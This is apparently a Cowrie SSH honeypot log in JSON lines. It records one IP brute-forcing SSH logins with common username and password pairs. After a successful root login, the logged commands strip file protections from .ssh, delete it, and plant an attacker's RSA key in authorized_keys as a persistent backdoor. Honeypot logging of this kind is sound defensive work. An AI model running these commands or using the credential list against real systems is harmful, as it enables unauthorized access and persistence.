{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:55.757885Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.login.success","username":"root","password":"juke2024","message":"login attempt [root/juke2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:00:57.457255Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:00:58.120057Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:00:58.120820Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:00:58.121727Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:58.710593Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:00:59.439803Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:00:59.440470Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:00:59.761201Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:59.762324Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60240,"dst_ip":"1.2.3.4","dst_port":22,"session":"7306b11b073a","protocol":"ssh","message":"New connection: 212.227.235.229:60240 (1.2.3.4:22) [session: 7306b11b073a]","sensor":"my-vps","timestamp":"2025-09-08T23:01:00.084876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:00.085678Z","src_ip":"212.227.235.229","session":"7306b11b073a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:00.403878Z","src_ip":"212.227.235.229","session":"7306b11b073a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:01.922974Z","src_ip":"212.227.235.229","session":"7306b11b073a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:03.245053Z","src_ip":"212.227.235.229","session":"7306b11b073a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60256,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b3be23621fd","protocol":"ssh","message":"New connection: 212.227.235.229:60256 (1.2.3.4:22) [session: 9b3be23621fd]","sensor":"my-vps","timestamp":"2025-09-08T23:01:03.572297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:03.573473Z","src_ip":"212.227.235.229","session":"9b3be23621fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:03.900873Z","src_ip":"212.227.235.229","session":"9b3be23621fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33846,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6d11d1d6c6c","protocol":"ssh","message":"New connection: 212.227.235.229:33846 (1.2.3.4:22) [session: c6d11d1d6c6c]","sensor":"my-vps","timestamp":"2025-09-08T23:01:04.904678Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:01:05.247707Z","src_ip":"212.227.235.229","session":"9b3be23621fd"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:05.573438Z","src_ip":"212.227.235.229","session":"901659b18081"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:05.574956Z","src_ip":"212.227.235.229","session":"9b3be23621fd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:05.859098Z","src_ip":"212.227.235.229","session":"c6d11d1d6c6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:05.859798Z","src_ip":"212.227.235.229","session":"c6d11d1d6c6c"}
{"eventid":"cowrie.login.failed","username":"init","password":"password123","message":"login attempt [init/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:06.854636Z","src_ip":"212.227.235.229","session":"c6d11d1d6c6c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:08.105563Z","src_ip":"212.227.235.229","session":"c6d11d1d6c6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55068,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e6b845b1cbc","protocol":"ssh","message":"New connection: 212.227.235.229:55068 (1.2.3.4:22) [session: 4e6b845b1cbc]","sensor":"my-vps","timestamp":"2025-09-08T23:01:11.687626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:11.688553Z","src_ip":"212.227.235.229","session":"4e6b845b1cbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:11.787972Z","src_ip":"212.227.235.229","session":"4e6b845b1cbc"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"Password1","message":"login attempt [nginx/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:12.228449Z","src_ip":"212.227.235.229","session":"4e6b845b1cbc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:13.331868Z","src_ip":"212.227.235.229","session":"4e6b845b1cbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43312,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d8e30971596","protocol":"ssh","message":"New connection: 212.227.235.229:43312 (1.2.3.4:22) [session: 6d8e30971596]","sensor":"my-vps","timestamp":"2025-09-08T23:01:14.260407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:14.281819Z","src_ip":"212.227.235.229","session":"6d8e30971596"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:14.514372Z","src_ip":"212.227.235.229","session":"6d8e30971596"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Admin@123","message":"login attempt [ubuntu/Admin@123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:15.536501Z","src_ip":"212.227.235.229","session":"6d8e30971596"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:16.791639Z","src_ip":"212.227.235.229","session":"6d8e30971596"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35538,"dst_ip":"1.2.3.4","dst_port":22,"session":"99568aa4ae09","protocol":"ssh","message":"New connection: 212.227.235.229:35538 (1.2.3.4:22) [session: 99568aa4ae09]","sensor":"my-vps","timestamp":"2025-09-08T23:01:22.370809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:22.372004Z","src_ip":"212.227.235.229","session":"99568aa4ae09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:22.471562Z","src_ip":"212.227.235.229","session":"99568aa4ae09"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser@123","message":"login attempt [ftpuser/ftpuser@123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:22.873052Z","src_ip":"212.227.235.229","session":"99568aa4ae09"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:23.976352Z","src_ip":"212.227.235.229","session":"99568aa4ae09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32806,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1bf7a038902","protocol":"ssh","message":"New connection: 212.227.235.229:32806 (1.2.3.4:22) [session: b1bf7a038902]","sensor":"my-vps","timestamp":"2025-09-08T23:01:28.384677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:28.385609Z","src_ip":"212.227.235.229","session":"b1bf7a038902"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:28.708073Z","src_ip":"212.227.235.229","session":"b1bf7a038902"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Welcome1","message":"login attempt [postgres/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:30.040354Z","src_ip":"212.227.235.229","session":"b1bf7a038902"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:31.365208Z","src_ip":"212.227.235.229","session":"b1bf7a038902"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47434,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9fddf4e24e8","protocol":"ssh","message":"New connection: 212.227.235.229:47434 (1.2.3.4:22) [session: f9fddf4e24e8]","sensor":"my-vps","timestamp":"2025-09-08T23:01:39.446233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:39.447349Z","src_ip":"212.227.235.229","session":"f9fddf4e24e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:39.758975Z","src_ip":"212.227.235.229","session":"f9fddf4e24e8"}
{"eventid":"cowrie.login.failed","username":"debian","password":"Welcome1","message":"login attempt [debian/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:41.049068Z","src_ip":"212.227.235.229","session":"f9fddf4e24e8"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:42.363665Z","src_ip":"212.227.235.229","session":"f9fddf4e24e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33410,"dst_ip":"1.2.3.4","dst_port":22,"session":"0028ebbaa1c3","protocol":"ssh","message":"New connection: 212.227.235.229:33410 (1.2.3.4:22) [session: 0028ebbaa1c3]","sensor":"my-vps","timestamp":"2025-09-08T23:01:43.688177Z"}
